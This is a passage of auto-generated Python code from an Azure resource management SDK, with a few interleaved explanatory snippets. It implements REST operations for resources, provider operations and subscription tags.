error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
result = AzureOperationResponse()
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
def get(self, resource_group_name, identity):
"""
Returns a resource belonging to a resource group.
Args:
resource_group_name (string): The name of the resource group. The name
is case insensitive.
identity (ResourceIdentity): Resource identity.
Returns:
ResourceGetResult: Resource information.
"""
# Validate
if resource_group_name is None:
raise ValueError('resource_group_name cannot be None.')
if len(resource_group_name) > 1000:
raise IndexError('resource_group_name is outside the valid range.')
if re.search('^[-\\w\\._]+$', resource_group_name) is None:
raise IndexError('resource_group_name is outside the valid range.')
if identity is None:
raise ValueError('identity cannot be None.')
if identity.resource_name is None:
raise ValueError('identity.resource_name cannot be None.')
if identity.resource_provider_api_version is None:
raise ValueError('identity.resource_provider_api_version cannot be None.')
if identity.resource_provider_namespace is None:
raise ValueError('identity.resource_provider_namespace cannot be None.')
if identity.resource_type is None:
raise ValueError('identity.resource_type cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/resourcegroups/'
url = url + quote(resource_group_name)
url = url + '/providers/'
url = url + quote(identity.resource_provider_namespace)
url = url + '/'
if identity.parent_resource_path is not None:
url = url + identity.parent_resource_path
url = url + '/'
url = url + identity.resource_type
url = url + '/'
url = url + quote(identity.resource_name)
query_parameters = []
query_parameters.append('api-version=' + quote(identity.resource_provider_api_version))
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url.endswith('/'):
base_url = base_url[:-1]
if url.startswith('/'):
url = url[1:]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'GET'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200 and status_code != 204:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200 or status_code == 204:
response_content = body
result = ResourceGetResult()
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
resource_instance = GenericResourceExtended(tags={})
result.resource = resource_instance
properties_value = response_doc.get('properties', None)
if properties_value is not None:
provisioning_state_value = properties_value.get('provisioningState', None)
if provisioning_state_value is not None:
provisioning_state_instance = provisioning_state_value
resource_instance.provisioning_state = provisioning_state_instance
properties_value2 = response_doc.get('properties', None)
if properties_value2 is not None:
properties_instance = json.dumps(properties_value2)
resource_instance.properties = properties_instance
provisioning_state_value2 = response_doc.get('provisioningState', None)
if provisioning_state_value2 is not None:
provisioning_state_instance2 = provisioning_state_value2
resource_instance.provisioning_state = provisioning_state_instance2
plan_value = response_doc.get('plan', None)
if plan_value is not None:
plan_instance = Plan()
resource_instance.plan = plan_instance
name_value = plan_value.get('name', None)
if name_value is not None:
name_instance = name_value
plan_instance.name = name_instance
publisher_value = plan_value.get('publisher', None)
if publisher_value is not None:
publisher_instance = publisher_value
plan_instance.publisher = publisher_instance
product_value = plan_value.get('product', None)
if product_value is not None:
product_instance = product_value
plan_instance.product = product_instance
promotion_code_value = plan_value.get('promotionCode', None)
if promotion_code_value is not None:
promotion_code_instance = promotion_code_value
plan_instance.promotion_code = promotion_code_instance
id_value = response_doc.get('id', None)
if id_value is not None:
id_instance = id_value
resource_instance.id = id_instance
name_value2 = response_doc.get('name', None)
if name_value2 is not None:
name_instance2 = name_value2
resource_instance.name = name_instance2
type_value = response_doc.get('type', None)
if type_value is not None:
type_instance = type_value
resource_instance.type = type_instance
location_value = response_doc.get('location', None)
if location_value is not None:
location_instance = location_value
resource_instance.location = location_instance
tags_sequence_element = response_doc.get('tags', None)
if tags_sequence_element is not None:
for tags_key, tags_value in tags_sequence_element.items():
resource_instance.tags[tags_key] = tags_value
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
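The key-by-key deserialization pattern repeated above can be sketched compactly. This is a simplified stand-in, with `SimpleNamespace` playing the role of the SDK's `GenericResourceExtended` and `Plan` models:

```python
from types import SimpleNamespace

def deserialize_resource(response_doc):
    """Copy known top-level keys from a response document into an
    attribute-style object, descending into the nested 'plan' dict and
    copying tags entry by entry, as the generated code above does."""
    resource = SimpleNamespace(tags={}, plan=None)
    for key in ('id', 'name', 'type', 'location'):
        if response_doc.get(key) is not None:
            setattr(resource, key, response_doc[key])
    plan_doc = response_doc.get('plan')
    if plan_doc is not None:
        resource.plan = SimpleNamespace(**plan_doc)
    for tags_key, tags_value in (response_doc.get('tags') or {}).items():
        resource.tags[tags_key] = tags_value
    return resource
```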
def list(self, parameters):
"""
Get all of the resources under a subscription.
Args:
parameters (ResourceListParameters): Query parameters. If None is
passed, all resources under the subscription are returned.
Returns:
ResourceListResult: List of resources.
"""
# Validate
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/'
if parameters is not None and parameters.resource_group_name is not None:
url = url + 'resourceGroups/' + quote(parameters.resource_group_name) + '/'
url = url + 'resources'
query_parameters = []
odata_filter = []
if parameters is not None and parameters.resource_type is not None:
odata_filter.append('resourceType eq \'' + quote(parameters.resource_type) + '\'')
if parameters is not None and parameters.tag_name is not None:
odata_filter.append('tagname eq \'' + quote(parameters.tag_name) + '\'')
if parameters is not None and parameters.tag_value is not None:
odata_filter.append('tagvalue eq \'' + quote(parameters.tag_value) + '\'')
if len(odata_filter) > 0:
query_parameters.append('$filter=' + ' and '.join(odata_filter))
if parameters is not None and parameters.top is not None:
query_parameters.append('$top=' + quote(str(parameters.top)))
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url.endswith('/'):
base_url = base_url[:-1]
if url.startswith('/'):
url = url[1:]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'GET'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200:
response_content = body
result = ResourceListResult(resources=[])
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
value_array = response_doc.get('value', None)
if value_array is not None:
for value_value in value_array:
resource_json_format_instance = GenericResourceExtended(tags={})
result.resources.append(resource_json_format_instance)
properties_value = value_value.get('properties', None)
if properties_value is not None:
provisioning_state_value = properties_value.get('provisioningState', None)
if provisioning_state_value is not None:
provisioning_state_instance = provisioning_state_value
resource_json_format_instance.provisioning_state = provisioning_state_instance
properties_value2 = value_value.get('properties', None)
if properties_value2 is not None:
properties_instance = json.dumps(properties_value2)
resource_json_format_instance.properties = properties_instance
provisioning_state_value2 = value_value.get('provisioningState', None)
if provisioning_state_value2 is not None:
provisioning_state_instance2 = provisioning_state_value2
resource_json_format_instance.provisioning_state = provisioning_state_instance2
plan_value = value_value.get('plan', None)
if plan_value is not None:
plan_instance = Plan()
resource_json_format_instance.plan = plan_instance
name_value = plan_value.get('name', None)
if name_value is not None:
name_instance = name_value
plan_instance.name = name_instance
publisher_value = plan_value.get('publisher', None)
if publisher_value is not None:
publisher_instance = publisher_value
plan_instance.publisher = publisher_instance
product_value = plan_value.get('product', None)
if product_value is not None:
product_instance = product_value
plan_instance.product = product_instance
promotion_code_value = plan_value.get('promotionCode', None)
if promotion_code_value is not None:
promotion_code_instance = promotion_code_value
plan_instance.promotion_code = promotion_code_instance
id_value = value_value.get('id', None)
if id_value is not None:
id_instance = id_value
resource_json_format_instance.id = id_instance
name_value2 = value_value.get('name', None)
if name_value2 is not None:
name_instance2 = name_value2
resource_json_format_instance.name = name_instance2
type_value = value_value.get('type', None)
if type_value is not None:
type_instance = type_value
resource_json_format_instance.type = type_instance
location_value = value_value.get('location', None)
if location_value is not None:
location_instance = location_value
resource_json_format_instance.location = location_instance
tags_sequence_element = value_value.get('tags', None)
if tags_sequence_element is not None:
for tags_key, tags_value in tags_sequence_element.items():
resource_json_format_instance.tags[tags_key] = tags_value
odatanext_link_value = response_doc.get('@odata.nextLink', None)
if odatanext_link_value is not None:
odatanext_link_instance = odatanext_link_value
result.next_link = odatanext_link_instance
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
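The `$filter` construction in `list` above can be sketched as one helper: each optional parameter contributes one OData clause, clauses are joined with `' and '`, and `$top` plus the fixed api-version complete the query string. The function name is illustrative; the parameter names mirror `ResourceListParameters`:

```python
from urllib.parse import quote

def build_filter_query(resource_type=None, tag_name=None, tag_value=None, top=None):
    """Build the query string used by the resource listing operation."""
    clauses = []
    if resource_type is not None:
        clauses.append("resourceType eq '" + quote(resource_type) + "'")
    if tag_name is not None:
        clauses.append("tagname eq '" + quote(tag_name) + "'")
    if tag_value is not None:
        clauses.append("tagvalue eq '" + quote(tag_value) + "'")
    query = []
    if clauses:
        query.append('$filter=' + ' and '.join(clauses))
    if top is not None:
        query.append('$top=' + str(top))
    query.append('api-version=2014-04-01-preview')
    return '?' + '&'.join(query)
```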
def list_next(self, next_link):
"""
Get the next page of resources using the NextLink from a previous
call to the List operation.
Args:
next_link (string): NextLink from the previous successful call to List
operation.
Returns:
ResourceListResult: List of resources.
"""
# Validate
if next_link is None:
raise ValueError('next_link cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + next_link
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'GET'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200:
response_content = body
result = ResourceListResult(resources=[])
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
value_array = response_doc.get('value', None)
if value_array is not None:
for value_value in value_array:
resource_json_format_instance = GenericResourceExtended(tags={})
result.resources.append(resource_json_format_instance)
properties_value = value_value.get('properties', None)
if properties_value is not None:
provisioning_state_value = properties_value.get('provisioningState', None)
if provisioning_state_value is not None:
provisioning_state_instance = provisioning_state_value
resource_json_format_instance.provisioning_state = provisioning_state_instance
properties_value2 = value_value.get('properties', None)
if properties_value2 is not None:
properties_instance = json.dumps(properties_value2)
resource_json_format_instance.properties = properties_instance
provisioning_state_value2 = value_value.get('provisioningState', None)
if provisioning_state_value2 is not None:
provisioning_state_instance2 = provisioning_state_value2
resource_json_format_instance.provisioning_state = provisioning_state_instance2
plan_value = value_value.get('plan', None)
if plan_value is not None:
plan_instance = Plan()
resource_json_format_instance.plan = plan_instance
name_value = plan_value.get('name', None)
if name_value is not None:
name_instance = name_value
plan_instance.name = name_instance
publisher_value = plan_value.get('publisher', None)
if publisher_value is not None:
publisher_instance = publisher_value
plan_instance.publisher = publisher_instance
product_value = plan_value.get('product', None)
if product_value is not None:
product_instance = product_value
plan_instance.product = product_instance
promotion_code_value = plan_value.get('promotionCode', None)
if promotion_code_value is not None:
promotion_code_instance = promotion_code_value
plan_instance.promotion_code = promotion_code_instance
id_value = value_value.get('id', None)
if id_value is not None:
id_instance = id_value
resource_json_format_instance.id = id_instance
name_value2 = value_value.get('name', None)
if name_value2 is not None:
name_instance2 = name_value2
resource_json_format_instance.name = name_instance2
type_value = value_value.get('type', None)
if type_value is not None:
type_instance = type_value
resource_json_format_instance.type = type_instance
location_value = value_value.get('location', None)
if location_value is not None:
location_instance = location_value
resource_json_format_instance.location = location_instance
tags_sequence_element = value_value.get('tags', None)
if tags_sequence_element is not None:
for tags_key, tags_value in tags_sequence_element.items():
resource_json_format_instance.tags[tags_key] = tags_value
odatanext_link_value = response_doc.get('@odata.nextLink', None)
if odatanext_link_value is not None:
odatanext_link_instance = odatanext_link_value
result.next_link = odatanext_link_instance
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
def move_resources(self, source_resource_group_name, parameters):
"""
Move resources within or across subscriptions.
Args:
source_resource_group_name (string): Source resource group name.
parameters (ResourcesMoveInfo): Parameters for the move operation.
Returns:
AzureOperationResponse: A standard service response including an HTTP
status code and request ID.
"""
# Validate
if source_resource_group_name is None:
raise ValueError('source_resource_group_name cannot be None.')
if parameters is None:
raise ValueError('parameters cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/resourceGroups/'
url = url + quote(source_resource_group_name)
url = url + '/moveResources'
query_parameters = []
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url.endswith('/'):
base_url = base_url[:-1]
if url.startswith('/'):
url = url[1:]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'POST'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Serialize Request
request_content = None
request_doc = None
resources_move_info_value = {}
request_doc = resources_move_info_value
if parameters.resources is not None:
resources_move_info_value['resources'] = list(parameters.resources)
if parameters.target_resource_group is not None:
resources_move_info_value['targetResourceGroup'] = parameters.target_resource_group
request_content = json.dumps(request_doc)
http_request.data = request_content
http_request.headers['Content-Length'] = str(len(request_content))
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 202:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
result = AzureOperationResponse()
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
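The `moveResources` POST body serialized in `move_resources` above reduces to a small document: an optional list of resource IDs plus an optional target resource group ID. A hedged standalone sketch (the function name is illustrative; the keys mirror `ResourcesMoveInfo`):

```python
import json

def build_move_resources_doc(resources=None, target_resource_group=None):
    """Build the moveResources request body: optional 'resources' list
    and optional 'targetResourceGroup', emitted only when set."""
    doc = {}
    if resources is not None:
        doc['resources'] = list(resources)
    if target_resource_group is not None:
        doc['targetResourceGroup'] = target_resource_group
    return json.dumps(doc)
```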
class ResourceProviderOperationDetailsOperations(object):
"""
Operations for managing Resource provider operations.
Note: An instance of this class is automatically created for an
instance of the ResourceManagementClient.
"""
def __init__(self, client):
self._client = client
@property
def client(self):
"""
Gets a reference to the underlying ResourceManagementClient.
"""
return self._client
def list(self, identity):
"""
Gets a list of resource provider operations.
Args:
identity (ResourceIdentity): Resource identity.
Returns:
ResourceProviderOperationDetailListResult: List of resource provider
operations.
"""
# Validate
if identity is None:
raise ValueError('identity cannot be None.')
if identity.resource_name is None:
raise ValueError('identity.resource_name cannot be None.')
if identity.resource_provider_api_version is None:
raise ValueError('identity.resource_provider_api_version cannot be None.')
if identity.resource_provider_namespace is None:
raise ValueError('identity.resource_provider_namespace cannot be None.')
if identity.resource_type is None:
raise ValueError('identity.resource_type cannot be None.')
        # Tracing

        # Construct URL
        url = ''
        url = url + '/providers/'
        url = url + quote(identity.resource_provider_namespace)
        url = url + '/operations'
        query_parameters = []
        query_parameters.append('api-version=' + quote(identity.resource_provider_api_version))
        if len(query_parameters) > 0:
            url = url + '?' + '&'.join(query_parameters)
        base_url = self.client.base_uri
        # Trim '/' character from the end of baseUrl and beginning of url.
        if base_url[len(base_url) - 1] == '/':
            base_url = base_url[0:len(base_url) - 1]
        if url[0] == '/':
            url = url[1:]
        url = base_url + '/' + url
        url = url.replace(' ', '%20')

        # Create HTTP transport objects
        http_request = Request()
        http_request.url = url
        http_request.method = 'GET'

        # Set Headers
        http_request.headers['Content-Type'] = 'application/json; charset=utf-8'

        # Send Request
        response = self.client.send_request(http_request)
        body = response.content
        status_code = response.status_code
        if status_code != 200 and status_code != 204:
            error = AzureHttpError(body, response.status_code)
            raise error
        # Create Result
        result = None
        # Deserialize Response
        if status_code == 200 or status_code == 204:
            response_content = body
            result = ResourceProviderOperationDetailListResult(resource_provider_operation_details=[])
            response_doc = None
            if response_content:
                response_doc = json.loads(response_content.decode())

            if response_doc is not None:
                value_array = response_doc.get('value', None)
                if value_array is not None:
                    for value_value in value_array:
                        resource_provider_operation_definition_instance = ResourceProviderOperationDefinition()
                        result.resource_provider_operation_details.append(resource_provider_operation_definition_instance)

                        name_value = value_value.get('name', None)
                        if name_value is not None:
                            name_instance = name_value
                            resource_provider_operation_definition_instance.name = name_instance

                        display_value = value_value.get('display', None)
                        if display_value is not None:
                            display_instance = ResourceProviderOperationDisplayProperties()
                            resource_provider_operation_definition_instance.resource_provider_operation_display_properties = display_instance

                            publisher_value = display_value.get('publisher', None)
                            if publisher_value is not None:
                                publisher_instance = publisher_value
                                display_instance.publisher = publisher_instance

                            provider_value = display_value.get('provider', None)
                            if provider_value is not None:
                                provider_instance = provider_value
                                display_instance.provider = provider_instance

                            resource_value = display_value.get('resource', None)
                            if resource_value is not None:
                                resource_instance = resource_value
                                display_instance.resource = resource_instance

                            operation_value = display_value.get('operation', None)
                            if operation_value is not None:
                                operation_instance = operation_value
                                display_instance.operation = operation_instance

                            description_value = display_value.get('description', None)
                            if description_value is not None:
                                description_instance = description_value
                                display_instance.description = description_instance

        result.status_code = status_code
        result.request_id = response.headers.get('x-ms-request-id')

        return result

class TagOperations(object):
    """
    Operations for managing tags.
    __NOTE__: An instance of this class is automatically created for an
    instance of the [ResourceManagementClient]
    """

    def __init__(self, client):
        self._client = client

    @property
    def client(self):
        """
        Gets a reference to the
        Microsoft.Azure.Management.Resources.ResourceManagementClient.
        """
        return self._client
    def create_or_update(self, tag_name):
        """
        Create a subscription resource tag.

        Args:
            tag_name (string): The name of the tag.

        Returns:
            TagCreateResult: Tag information.
        """
        # Validate
        if tag_name is None:
            raise ValueError('tag_name cannot be None.')

        # Tracing

        # Construct URL
        url = ''
        url = url + '/subscriptions/'
        if self.client.credentials.subscription_id is not None:
            url = url + quote(self.client.credentials.subscription_id)
        url = url + '/tagNames/'
        url = url + quote(tag_name)
        query_parameters = []
        query_parameters.append('api-version=2014-04-01-preview')
        if len(query_parameters) > 0:
            url = url + '?' + '&'.join(query_parameters)
        base_url = self.client.base_uri
        # Trim '/' character from the end of baseUrl and beginning of url.
        if base_url[len(base_url) - 1] == '/':
            base_url = base_url[0:len(base_url) - 1]
        if url[0] == '/':
            url = url[1:]
        url = base_url + '/' + url
        url = url.replace(' ', '%20')

        # Create HTTP transport objects
        http_request = Request()
        http_request.url = url
        http_request.method = 'PUT'

        # Set Headers
        http_request.headers['Content-Type'] = 'application/json; charset=utf-8'

        # Send Request
        response = self.client.send_request(http_request)
        body = response.content
        status_code = response.status_code
        if status_code != 200 and status_code != 201:
            error = AzureHttpError(body, response.status_code)
            raise error
        # Create Result
        result = None
        # Deserialize Response
        if status_code == 200 or status_code == 201:
            response_content = body
            result = TagCreateResult()
            response_doc = None
            if response_content:
                response_doc = json.loads(response_content.decode())

            if response_doc is not None:
                tag_instance = TagDetails(values=[])
                result.tag = tag_instance

                id_value = response_doc.get('id', None)
                if id_value is not None:
                    id_instance = id_value
                    tag_instance.id = id_instance

                tag_name_value = response_doc.get('tagName', None)
                if tag_name_value is not None:
                    tag_name_instance = tag_name_value
                    tag_instance.name = tag_name_instance

                count_value = response_doc.get('count', None)
                if count_value is not None:
                    count_instance = TagCount()
                    tag_instance.count = count_instance

                    type_value = count_value.get('type', None)
                    if type_value is not None:
                        type_instance = type_value
                        count_instance.type = type_instance

                    value_value = count_value.get('value', None)
                    if value_value is not None:
                        value_instance = value_value
                        count_instance.value = value_instance

                values_array = response_doc.get('values', None)
                if values_array is not None:
                    for values_value in values_array:
                        tag_value_instance = TagValue()
                        tag_instance.values.append(tag_value_instance)

                        id_value2 = values_value.get('id', None)
                        if id_value2 is not None:
                            id_instance2 = id_value2
                            tag_value_instance.id = id_instance2

                        tag_value_value = values_value.get('tagValue', None)
                        if tag_value_value is not None:
                            tag_value_instance2 = tag_value_value
                            tag_value_instance.value = tag_value_instance2

                        count_value2 = values_value.get('count', None)
                        if count_value2 is not None:
                            count_instance2 = TagCount()
                            tag_value_instance.count = count_instance2

                            type_value2 = count_value2.get('type', None)
                            if type_value2 is not None:
                                type_instance2 = type_value2
                                count_instance2.type = type_instance2

                            value_value2 = count_value2.get('value', None)
                            if value_value2 is not None:
                                value_instance2 = value_value2
                                count_instance2.value = value_instance2

        result.status_code = status_code
        result.request_id = response.headers.get('x-ms-request-id')

        return result
    def create_or_update_value(self, tag_name, tag_value):
        """
        Create a subscription resource tag value.

        Args:
            tag_name (string): The name of the tag.
            tag_value (string): The value of the tag.

        Returns:
            TagCreateValueResult: Tag information.
        """
        # Validate
        if tag_name is None:
            raise ValueError('tag_name cannot be None.')
        if tag_value is None:
            raise ValueError('tag_value cannot be None.')

        # Tracing

        # Construct URL
        url = ''
        url = url + '/subscriptions/'
        if self.client.credentials.subscription_id is not None:
            url = url + quote(self.client.credentials.subscription_id)
        url = url + '/tagNames/'
        url = url + quote(tag_name)
        url = url + '/tagValues/'
        url = url + quote(tag_value)
        query_parameters = []
        query_parameters.append('api-version=2014-04-01-preview')
        if len(query_parameters) > 0:
            url = url + '?' + '&'.join(query_parameters)
        base_url = self.client.base_uri
        # Trim '/' character from the end of baseUrl and beginning of url.
        if base_url[len(base_url) - 1] == '/':
            base_url = base_url[0:len(base_url) - 1]
        if url[0] == '/':
            url = url[1:]
        url = base_url + '/' + url
        url = url.replace(' ', '%20')

        # Create HTTP transport objects
        http_request = Request()
        http_request.url = url
        http_request.method = 'PUT'

        # Set Headers
        http_request.headers['Content-Type'] = 'application/json; charset=utf-8'

        # Send Request
        response = self.client.send_request(http_request)
        body = response.content
        status_code = response.status_code
        if status_code != 200 and status_code != 201:
            error = AzureHttpError(body, response.status_code)
            raise error
        # Create Result
        result = None
        # Deserialize Response
        if status_code == 200 or status_code == 201:
            response_content = body
            result = TagCreateValueResult()
            response_doc = None
            if response_content:
                response_doc = json.loads(response_content.decode())

            if response_doc is not None:
                value_instance = TagValue()
                result.value = value_instance

                id_value = response_doc.get('id', None)
                if id_value is not None:
                    id_instance = id_value
                    value_instance.id = id_instance

                tag_value_value = response_doc.get('tagValue', None)
                if tag_value_value is not None:
                    tag_value_instance = tag_value_value
                    value_instance.value = tag_value_instance

                count_value = response_doc.get('count', None)
                if count_value is not None:
                    count_instance = TagCount()
                    value_instance.count = count_instance

                    type_value = count_value.get('type', None)
                    if type_value is not None:
                        type_instance = type_value
                        count_instance.type = type_instance

                    value_value = count_value.get('value', None)
                    if value_value is not None:
                        value_instance2 = value_value
                        count_instance.value = value_instance2

        result.status_code = status_code
        result.request_id = response.headers.get('x-ms-request-id')

        return result
    def delete(self, tag_name):
        """
        Delete a subscription resource tag.

        Args:
            tag_name (string): The name of the tag.

        Returns:
            AzureOperationResponse: A standard service response including an
            HTTP status code and request ID.
        """
        # Validate
        if tag_name is None:
            raise ValueError('tag_name cannot be None.')

        # Tracing

        # Construct URL
        url = ''
        url = url + '/subscriptions/'
        if self.client.credentials.subscription_id is not None:
            url = url + quote(self.client.credentials.subscription_id)
        url = url + '/tagNames/'
        url = url + quote(tag_name)
        query_parameters = []
        query_parameters.append('api-version=2014-04-01-preview')
        if len(query_parameters) > 0:
            url = url + '?' + '&'.join(query_parameters)
        base_url = self.client.base_uri
        # Trim '/' character from the end of baseUrl and beginning of url.
        if base_url[len(base_url) - 1] == '/':
            base_url = base_url[0:len(base_url) - 1]
        if url[0] == '/':
            url = url[1:]
        url = base_url + '/' + url
        url = url.replace(' ', '%20')

        # Create HTTP transport objects
        http_request = Request()
        http_request.url = url
        http_request.method = 'DELETE'

        # Set Headers
        http_request.headers['Content-Type'] = 'application/json; charset=utf-8'

        # Send Request
        response = self.client.send_request(http_request)
        body = response.content
        status_code = response.status_code
        if status_code != 200 and status_code != 204:
            error = AzureHttpError(body, response.status_code)
            raise error

        # Create Result
        result = None
        # Deserialize Response
        result = AzureOperationResponse()
        result.status_code = status_code
        result.request_id = response.headers.get('x-ms-request-id')

        return result
    def delete_value(self, tag_name, tag_value):
        """
        Delete a subscription resource tag value.

        Args:
            tag_name (string): The name of the tag.
            tag_value (string): The value of the tag.

        Returns:
            AzureOperationResponse: A standard service response including an
            HTTP status code and request ID.
        """
        # Validate
        if tag_name is None:
            raise ValueError('tag_name cannot be None.')
        if tag_value is None:
            raise ValueError('tag_value cannot be None.')

        # Tracing

        # Construct URL
        url = ''
        url = url + '/subscriptions/'
        if self.client.credentials.subscription_id is not None:
            url = url + quote(self.client.credentials.subscription_id)
        url = url + '/tagNames/'
        url = url + quote(tag_name)
        url = url + '/tagValues/'
        url = url + quote(tag_value)
        query_parameters = []
        query_parameters.append('api-version=2014-04-01-preview')
        if len(query_parameters) > 0:
            url = url + '?' + '&'.join(query_parameters)
        base_url = self.client.base_uri
        # Trim '/' character from the end of baseUrl and beginning of url.
        if base_url[len(base_url) - 1] == '/':
            base_url = base_url[0:len(base_url) - 1]
        if url[0] == '/':
            url = url[1:]
        url = base_url + '/' + url
        url = url.replace(' ', '%20')

        # Create HTTP transport objects
        http_request = Request()
        http_request.url = url
        http_request.method = 'DELETE'

        # Set Headers
        http_request.headers['Content-Type'] = 'application/json; charset=utf-8'

        # Send Request
        response = self.client.send_request(http_request)
        body = response.content
        status_code = response.status_code
        if status_code != 200 and status_code != 204:
            error = AzureHttpError(body, response.status_code)
            raise error

        # Create Result
        result = None
        # Deserialize Response
        result = AzureOperationResponse()
        result.status_code = status_code
        result.request_id = response.headers.get('x-ms-request-id')

        return result
    def list(self):
        """
        Get a list of subscription resource tags.

        Returns:
            TagsListResult: List of subscription tags.
        """
        # Validate

        # Tracing

        # Construct URL
        url = ''
        url = url + '/subscriptions/'
        if self.client.credentials.subscription_id is not None:
            url = url + quote(self.client.credentials.subscription_id)
        url = url + '/tagNames'
        query_parameters = []
        query_parameters.append('api-version=2014-04-01-preview')
        if len(query_parameters) > 0:
            url = url + '?' + '&'.join(query_parameters)
        base_url = self.client.base_uri
        # Trim '/' character from the end of baseUrl and beginning of url.
        if base_url[len(base_url) - 1] == '/':
            base_url = base_url[0:len(base_url) - 1]
        if url[0] == '/':
            url = url[1:]
        url = base_url + '/' + url
        url = url.replace(' ', '%20')

        # Create HTTP transport objects
        http_request = Request()
        http_request.url = url
        http_request.method = 'GET'

        # Set Headers
        http_request.headers['Content-Type'] = 'application/json; charset=utf-8'

        # Send Request
        response = self.client.send_request(http_request)
        body = response.content
        status_code = response.status_code
        if status_code != 200:
            error = AzureHttpError(body, response.status_code)
            raise error
        # Create Result
        result = None
        # Deserialize Response
        if status_code == 200:
            response_content = body
            result = TagsListResult(tags=[])
            response_doc = None
            if response_content:
                response_doc = json.loads(response_content.decode())

            if response_doc is not None:
                value_array = response_doc.get('value', None)
                if value_array is not None:
                    for value_value in value_array:
                        tag_details_instance = TagDetails(values=[])
                        result.tags.append(tag_details_instance)

                        id_value = value_value.get('id', None)
                        if id_value is not None:
                            id_instance = id_value
                            tag_details_instance.id = id_instance

                        tag_name_value = value_value.get('tagName', None)
                        if tag_name_value is not None:
                            tag_name_instance = tag_name_value
                            tag_details_instance.name = tag_name_instance

                        count_value = value_value.get('count', None)
                        if count_value is not None:
                            count_instance = TagCount()
                            tag_details_instance.count = count_instance

                            type_value = count_value.get('type', None)
                            if type_value is not None:
                                type_instance = type_value
                                count_instance.type = type_instance

                            value_value2 = count_value.get('value', None)
                            if value_value2 is not None:
                                value_instance = value_value2
                                count_instance.value = value_instance

                        values_array = value_value.get('values', None)
                        if values_array is not None:
                            for values_value in values_array:
                                tag_value_instance = TagValue()
                                tag_details_instance.values.append(tag_value_instance)

                                id_value2 = values_value.get('id', None)
                                if id_value2 is not None:
                                    id_instance2 = id_value2
                                    tag_value_instance.id = id_instance2

                                tag_value_value = values_value.get('tagValue', None)
                                if tag_value_value is not None:
                                    tag_value_instance2 = tag_value_value
                                    tag_value_instance.value = tag_value_instance2

                                count_value2 = values_value.get('count', None)
                                if count_value2 is not None:
                                    count_instance2 = TagCount()
                                    tag_value_instance.count = count_instance2

                                    type_value2 = count_value2.get('type', None)
                                    if type_value2 is not None:
                                        type_instance2 = type_value2
                                        count_instance2.type = type_instance2

                                    value_value3 = count_value2.get('value', None)
                                    if value_value3 is not None:
                                        value_instance2 = value_value3
                                        count_instance2.value = value_instance2

                odatanext_link_value = response_doc.get('@odata.nextLink', None)
                if odatanext_link_value is not None:
                    odatanext_link_instance = odatanext_link_value
                    result.next_link = odatanext_link_instance

        result.status_code = status_code
        result.request_id = response.headers.get('x-ms-request-id')

        return result
    def list_next(self, next_link):
        """
        Get a list of tags under a subscription.

        Args:
            next_link (string): NextLink from the previous successful call to
            the List operation.

        Returns:
            TagsListResult: List of subscription tags.
        """
        # Validate
        if next_link is None:
            raise ValueError('next_link cannot be None.')

        # Tracing

        # Construct URL
        url = ''
        url = url + next_link
        url = url.replace(' ', '%20')

        # Create HTTP transport objects
        http_request = Request()
        http_request.url = url
        http_request.method = 'GET'

        # Set Headers
        http_request.headers['Content-Type'] = 'application/json; charset=utf-8'

        # Send Request
        response = self.client.send_request(http_request)
        body = response.content
        status_code = response.status_code
        if status_code != 200:
            error = AzureHttpError(body, response.status_code)
            raise error
        # Create Result
        result = None
        # Deserialize Response
        if status_code == 200:
            response_content = body
            result = TagsListResult(tags=[])
            response_doc = None
